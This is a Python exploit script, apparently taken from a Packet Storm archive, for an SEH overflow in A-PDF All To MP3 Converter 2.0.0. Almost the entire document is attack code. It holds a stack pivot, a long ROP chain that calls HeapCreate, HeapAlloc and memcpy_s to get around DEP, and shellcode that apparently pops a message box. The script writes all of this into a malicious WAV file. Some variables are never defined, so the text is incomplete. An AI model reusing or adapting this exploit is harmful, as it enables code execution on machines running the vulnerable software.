Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1#######################      STACK PIVOT      ###########################SEH = struct.pack("<I", 0x005CE870) # 0x005CE870  add esp 0x800, 4 pops, ret [alltomp3.exe]#######################    1. Get Stack Pointer to point to ZZZZ    ###########################ROP = struct.pack("<I", 0x0042C7CB)  # 0x0042C7CB      # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  ** ROP += b"A" * 4ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret  ;  (1 found)ROP += struct.pack("<I", 0xffffff1c)ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x41414141)*4ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ;  (1 found)ROP += b"A" * 4# ecx points to ZZZZ#######################    2. Get and set ZZZZ to HeapCreate        ###########################ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret  ;  (1 found) [Module : lame_enc.dll]ROP += b"A" * 0x10ROP += struct.pack("<I", 0x1003D058) # HEAPCREATE IATROP += struct.pack("<I", 0x10033344) # 0x10033344: mov eax, dword [eax] ; pop esi ; ret  ;  (1 found) [Module : lame_enc.dll]ROP += struct.pack("<I", 0x41414141)# eax has HeapCreateROP += struct.pack("<I", 0x1003303A) # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN   [Module : lame_enc.dll]  ** ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret  ;  (1 found) [Module : lame_enc.dll]#######################    3. Set RET                               ###########################ROP += struct.pack("<I", 0x1003c452)  # 0x1003c452: pop eax ; ret  ;  (1 found)ROP += struct.pack("<I", 0x1001939e)  # 0x1001939e: add esp, 0x000001A0 ; ret  ;  (1 found)ROP += struct.pack("<I", 0x1003303A)  # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN   [Module : lame_enc.dll]  ** #######################    4. Go to HeapCreate                      ###########################ROP += struct.pack("<I", 0x0042C7CB)  # 0x0042C7CB      # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  ** ROP += b"A" * 4ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret  ;  (1 found)ROP += struct.pack("<I", 0xfffffea4)ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x41414141)*4ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x1002a3b5)*10 # 0x1002a3b5: ret  ;  (1 found) // pad it# when heap create finishes, eax will have hHeapROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found)#######################    5. Get Stack Pointer to point to YYYY    ###########################ROP += struct.pack("<I", 0x0042C7CB)  # 0x0042C7CB      # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  ** ROP += b"A" * 4ROP += struct.pack("<I", 0x10004f62) # 0x10004f62: pop ebx ; ret  ;  (1 found)ROP += struct.pack("<I", 0xfffffe58)ROP += struct.pack("<I", 0x10007d44) # 0x10007d44: add eax, ebx ; pop ebx ; add esp, 0x08 ; ret  ;  (1 found)ROP += struct.pack("<I", 0x41414141)*3ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ;  (1 found)ROP += b"A" * 4# ecx points to YYYY#######################    6. Get and set YYYY to HeapAlloc        ###########################ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret  ;  (1 found) [Module : lame_enc.dll]ROP += b"A" * 0x10ROP += struct.pack("<I", 0x1003D014) # HEAPALLOC IATROP += struct.pack("<I", 0x10033344) # 0x10033344: mov eax, dword [eax] ; pop esi ; ret  ;  (1 found) [Module : lame_enc.dll]ROP += struct.pack("<I", 0x41414141)# eax has HeapCreateROP += struct.pack("<I", 0x1003303A) # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN   [Module : lame_enc.dll]  ** ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret  ;  (1 found) [Module : lame_enc.dll]#######################    7. Set RET                               ###########################ROP += struct.pack("<I", 0x1003c452)  # 0x1003c452: pop eax ; ret  ;  (1 found)ROP += struct.pack("<I", 0x10014d32)  # 0x10014d32: add esp, 0x00000280 ; ret  ;  (1 found)ROP += struct.pack("<I", 0x1003303A)  # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN   [Module : lame_enc.dll]  ** ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret  ;  (1 found) [Module : lame_enc.dll]#######################    8. Set hHEAP                             ###########################ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found) <- should return here and start executing hereROP += struct.pack("<I", 0x1003303A) # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN   [Module : lame_enc.dll]  ** #######################    9. Go to HeapAlloc                      ###########################ROP += struct.pack("<I", 0x0042C7CB)  # 0x0042C7CB      # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  ** ROP += b"A" * 4ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret  ;  (1 found)ROP += struct.pack("<I", 0xfffffdcc)ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x41414141)*4ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret  ;  (1 found)# when heap create finishes, eax will have hHeapROP += struct.pack("<I", 0x1002a3b5)*20 # 0x1002a3b5: ret  ;  (1 found) // pad itROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found)#######################    10. Get Stack Pointer to point to DDDD   ###########################ROP += struct.pack("<I", 0x0042C7CB)  # 0x0042C7CB      # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  ** ROP += b"A" * 4ROP += struct.pack("<I", 0x10004f62) # 0x10004f62: pop ebx ; ret  ;  (1 found)ROP += struct.pack("<I", 0xfffffd5c)ROP += struct.pack("<I", 0x10007d44) # 0x10007d44: add eax, ebx ; pop ebx ; add esp, 0x08 ; ret  ;  (1 found)ROP += struct.pack("<I", 0x41414141)*3ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ;  (1 found)ROP += b"A" * 4# ecx points to DDDD#######################    12. Set RET                              ###########################ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found)ROP += b"A"*0x10ROP += struct.pack("<I", 0x1003303A) # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN   [Module : lame_enc.dll]  ** ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret  ;  (1 found) [Module : lame_enc.dll]#######################    13. DESTIN                                ###########################ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x1003303A) # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN   [Module : lame_enc.dll]  ** ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x100345ee)*8 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret  ;  (1 found) [Module : lame_enc.dll]* #######################    14. SOURCE                                ###########################ROP += struct.pack("<I", 0x0042C7CB)  # 0x0042C7CB      # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  ** ROP += b"A" * 4ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret  ;  (1 found)ROP += struct.pack("<I", 0x000000a0)ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x41414141)*4ROP += struct.pack("<I", 0x1003303A) # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN   [Module : lame_enc.dll]  ** ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found)#######################    15. GOTO _memcpy_s                        ###########################ROP += struct.pack("<I", 0x0042C7CB)  # 0x0042C7CB      # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  ** ROP += b"A" * 4ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret  ;  (1 found)ROP += struct.pack("<I", 0xfffffc94)ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x41414141)*4ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret  ;  (1 found)#######################  SHELLCODE  ###########################shellcode = b"\xcc" * 400real_shellcode = b"\x33\xc9\x64\x8b\x49\x30\x8b\x49\x0c\x8b"real_shellcode += b"\x49\x1c\x8b\x59\x08\x8b\x41\x20\x8b\x09"real_shellcode += b"\x80\x78\x0c\x33\x75\xf2\x8b\xeb\x03\x6d"real_shellcode += b"\x3c\x8b\x6d\x78\x03\xeb\x8b\x45\x20\x03"real_shellcode += b"\xc3\x33\xd2\x8b\x34\x90\x03\xf3\x42\x81"real_shellcode += b"\x3e\x47\x65\x74\x50\x75\xf2\x81\x7e\x04"real_shellcode += b"\x72\x6f\x63\x41\x75\xe9\x8b\x75\x24\x03"real_shellcode += b"\xf3\x66\x8b\x14\x56\x8b\x75\x1c\x03\xf3"real_shellcode += b"\x8b\x74\x96\xfc\x03\xf3\x33\xff\x57\x68"real_shellcode += b"\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68"real_shellcode += b"\x4c\x6f\x61\x64\x54\x53\xff\xd6\x33\xc9"real_shellcode += b"\x57\x66\xb9\x33\x32\x51\x68\x75\x73\x65"real_shellcode += b"\x72\x54\xff\xd0\x57\x68\x6f\x78\x41\x01"real_shellcode += b"\xfe\x4c\x24\x03\x68\x61\x67\x65\x42\x68"real_shellcode += b"\x4d\x65\x73\x73\x54\x50\xff\xd6\x57\x68"real_shellcode += b"\x72\x6c\x64\x21\x68\x6f\x20\x57\x6f\x68"real_shellcode += b"\x48\x65\x6c\x6c\x8b\xcc\x57\x57\x51\x57"real_shellcode += b"\xff\xd0\x57\x68\x65\x73\x73\x01\xfe\x4c"real_shellcode += b"\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78"real_shellcode += b"\x69\x74\x54\x53\xff\xd6\x57\xff\xd0"#######################  CONSTRUCT  ###########################SIZE = 500start_of_padding = b"A" * (SIZE-len(EXE)-len(shellcode))start_of_padding += shellcodestart_of_padding += EXESIZE = 1500RET_NOP_TO_ROP = b"A" * 0x70 + struct.pack("I", 0x1003c6aa) * 10 # RET#INT = struct.pack("I", 0x1000f2b3) + b"BBBB" # 0x1000f2b3: int3  ; pop esi ; ret  ;  (1 found)INT = struct.pack("I", 0x1003c6aa)*2rest_of_payload = RET_NOP_TO_ROP + INT + ROP # 160 + 14*4 + 172rest_of_payload += b"\x90" * 100rest_of_payload += real_shellcoderest_of_payload += b"\x90" * (SIZE-len(rest_of_payload))payload = junk + SEH + start_of_padding + rest_of_payloadREST = b"\x44" * (size-len(payload))payload += RESTfile = open("1.wav", "wb")file.write(payload)file.close()

A-PDF All To MP3 Converter 2.0.0 Overflow

This archive contains all of the 106 exploits added to Packet Storm in February, 2024.